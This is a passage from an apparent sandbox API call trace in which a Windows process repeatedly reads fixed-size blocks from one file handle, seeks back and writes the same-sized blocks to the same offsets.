lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.574] GetProcessHeap () returned 0x500000 [0115.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.574] GetProcessHeap () returned 0x500000 [0115.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.574] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x30a32c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.574] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.585] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x30a32c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.585] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.585] GetProcessHeap () returned 0x500000 [0115.585] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.585] GetProcessHeap () returned 0x500000 [0115.585] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.585] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x30e0350, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.586] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.596] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x30e0350, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.596] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.597] GetProcessHeap () returned 0x500000 [0115.597] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.597] GetProcessHeap () returned 0x500000 [0115.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.597] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x311d3e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.597] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.618] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x311d3e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.618] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.618] GetProcessHeap () returned 0x500000 [0115.618] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.618] GetProcessHeap () returned 0x500000 [0115.618] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.618] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x315a470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.619] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.651] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x315a470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.651] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.652] GetProcessHeap () returned 0x500000 [0115.652] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.652] GetProcessHeap () returned 0x500000 [0115.652] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.652] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3197500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.652] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.662] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3197500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.662] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.663] GetProcessHeap () returned 0x500000 [0115.663] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.663] GetProcessHeap () returned 0x500000 [0115.663] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.663] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x31d4590, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.663] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.673] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x31d4590, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.674] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.674] GetProcessHeap () returned 0x500000 [0115.674] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.674] GetProcessHeap () returned 0x500000 [0115.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.674] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3211620, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.674] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.697] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3211620, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.697] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.697] GetProcessHeap () returned 0x500000 [0115.697] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.697] GetProcessHeap () returned 0x500000 [0115.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.698] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x324e6b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.698] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.708] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x324e6b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.708] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.708] GetProcessHeap () returned 0x500000 [0115.708] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.708] GetProcessHeap () returned 0x500000 [0115.708] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.708] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x328b740, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.708] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.717] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x328b740, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.717] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.717] GetProcessHeap () returned 0x500000 [0115.717] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.717] GetProcessHeap () returned 0x500000 [0115.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.717] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x32c87d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.717] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.726] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x32c87d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.726] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.727] GetProcessHeap () returned 0x500000 [0115.727] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.727] GetProcessHeap () returned 0x500000 [0115.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.727] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3305860, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.727] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.744] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3305860, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.745] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.745] GetProcessHeap () returned 0x500000 [0115.745] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.745] GetProcessHeap () returned 0x500000 [0115.745] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.745] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x33428f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.745] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.756] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x33428f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.756] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.756] GetProcessHeap () returned 0x500000 [0115.757] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.757] GetProcessHeap () returned 0x500000 [0115.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.757] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x337f980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.757] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.768] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x337f980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.768] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.769] GetProcessHeap () returned 0x500000 [0115.769] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.769] GetProcessHeap () returned 0x500000 [0115.769] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.769] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x33bca10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.769] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x33bca10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.781] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.782] GetProcessHeap () returned 0x500000 [0115.782] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.782] GetProcessHeap () returned 0x500000 [0115.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.782] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x33f9aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.782] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.809] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x33f9aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.809] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.811] GetProcessHeap () returned 0x500000 [0115.811] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.811] GetProcessHeap () returned 0x500000 [0115.811] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.811] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3436b30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.811] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.823] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3436b30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.823] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.824] GetProcessHeap () returned 0x500000 [0115.824] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.824] GetProcessHeap () returned 0x500000 [0115.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.824] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3473bc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.824] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.835] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3473bc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.835] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.835] GetProcessHeap () returned 0x500000 [0115.836] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.836] GetProcessHeap () returned 0x500000 [0115.836] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.836] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x34b0c50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.836] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.871] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x34b0c50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.871] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.872] GetProcessHeap () returned 0x500000 [0115.872] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.872] GetProcessHeap () returned 0x500000 [0115.872] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.872] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x34edce0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.872] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.892] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x34edce0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.892] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.894] GetProcessHeap () returned 0x500000 [0115.894] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.894] GetProcessHeap () returned 0x500000 [0115.894] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.894] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x352ad70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.894] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.905] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x352ad70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.905] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.906] GetProcessHeap () returned 0x500000 [0115.906] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.906] GetProcessHeap () returned 0x500000 [0115.906] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.906] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3567e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.906] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.939] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3567e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.939] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.939] GetProcessHeap () returned 0x500000 [0115.939] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.939] GetProcessHeap () returned 0x500000 [0115.939] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.939] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x35a4e90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.940] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.951] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x35a4e90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.951] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.952] GetProcessHeap () returned 0x500000 [0115.952] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.952] GetProcessHeap () returned 0x500000 [0115.952] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.952] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x35e1f20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.952] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.973] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x35e1f20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.973] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, 